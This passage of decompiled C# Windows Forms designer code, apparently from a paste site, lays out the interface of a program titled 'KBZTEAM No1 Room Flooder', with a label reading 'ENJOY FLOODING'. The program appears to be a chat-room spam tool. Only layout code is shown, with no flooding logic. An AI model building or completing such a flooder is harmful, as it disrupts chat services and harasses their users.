  1661. this.tabPage3.Location = new Point(4, 22);
  1662. this.tabPage3.Name = "tabPage3";
  1663. this.tabPage3.Padding = new Padding(3);
  1664. this.tabPage3.Size = new Size(457, 304);
  1665. this.tabPage3.TabIndex = 2;
  1666. this.tabPage3.Text = "ROOM SETTING";
  1667. this.label12.AutoSize = true;
  1668. this.label12.Font = new Font("Jokerman", 14.25f, FontStyle.Bold | FontStyle.Italic, GraphicsUnit.Point, 0);
  1669. this.label12.ForeColor = Color.Lime;
  1670. this.label12.Location = new Point(3, 264);
  1671. this.label12.Name = "label12";
  1672. this.label12.Size = new Size(236, 28);
  1673. this.label12.TabIndex = 29;
  1674. this.label12.Text = "ENJOY FLOODING ....";
  1675. this.pictureBox4.Image = (Image)componentResourceManager.GetObject("pictureBox4.Image");
  1676. this.pictureBox4.Location = new Point(4, 11);
  1677. this.pictureBox4.Name = "pictureBox4";
  1678. this.pictureBox4.Size = new Size(115, 97);
  1679. this.pictureBox4.SizeMode = PictureBoxSizeMode.StretchImage;
  1680. this.pictureBox4.TabIndex = 34;
  1681. this.pictureBox4.TabStop = false;
  1682. base.AccessibleRole = AccessibleRole.Grip;
  1683. base.AutoScaleDimensions = new SizeF(6f, 13f);
  1684. base.AutoScaleMode = AutoScaleMode.Font;
  1685. this.BackColor = Color.FromArgb(255, 128, 0);
  1686. base.ClientSize = new Size(467, 476);
  1687. base.Controls.Add(this.pictureBox4);
  1688. base.Controls.Add(this.tabControl1);
  1689. base.Controls.Add(this.groupBox1);
  1690. base.Controls.Add(this.label2);
  1691. base.Controls.Add(this.label1);
  1692. this.Cursor = Cursors.Default;
  1693. this.ForeColor = Color.White;
  1694. base.FormBorderStyle = FormBorderStyle.FixedSingle;
  1695. base.Icon = (Icon)componentResourceManager.GetObject("$this.Icon");
  1696. base.Name = "Form1";
  1697. this.Text = "KBZTEAM No1 Room Flooder By Balu Krishna";
  1698. base.Load += new EventHandler(this.Form1_Load);
  1699. ((ISupportInitialize)this.pictureBox2).EndInit();
  1700. ((ISupportInitialize)this.pictureBox1).EndInit();
  1701. this.groupBox1.ResumeLayout(false);
  1702. this.groupBox1.PerformLayout();
  1703. this.groupBox2.ResumeLayout(false);
  1704. this.groupBox2.PerformLayout();
  1705. this.groupBox3.ResumeLayout(false);
  1706. this.groupBox3.PerformLayout();
  1707. this.groupBox4.ResumeLayout(false);
  1708. this.groupBox4.PerformLayout();
  1709. this.groupBox5.ResumeLayout(false);
  1710. this.groupBox5.PerformLayout();
  1711. this.groupBox6.ResumeLayout(false);
  1712. this.groupBox6.PerformLayout();
  1713. this.groupBox7.ResumeLayout(false);
  1714. this.groupBox7.PerformLayout();
  1715. ((ISupportInitialize)this.pictureBox3).EndInit();
  1716. this.groupBox8.ResumeLayout(false);
  1717. this.groupBox8.PerformLayout();
  1718. ((ISupportInitialize)this.numericUpDown1).EndInit();
  1719. this.groupBox9.ResumeLayout(false);
  1720. this.groupBox9.PerformLayout();
  1721. this.tabControl1.ResumeLayout(false);
  1722. this.tabPage1.ResumeLayout(false);
  1723. this.tabPage1.PerformLayout();
  1724. this.groupBox10.ResumeLayout(false);
  1725. this.groupBox10.PerformLayout();
  1726. this.tabPage2.ResumeLayout(false);
  1727. this.tabPage3.ResumeLayout(false);
  1728. this.tabPage3.PerformLayout();
  1729. ((ISupportInitialize)this.pictureBox4).EndInit();
  1730. base.ResumeLayout(false);
  1731. base.PerformLayout();
  1732. }
  1733. }
  1734. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement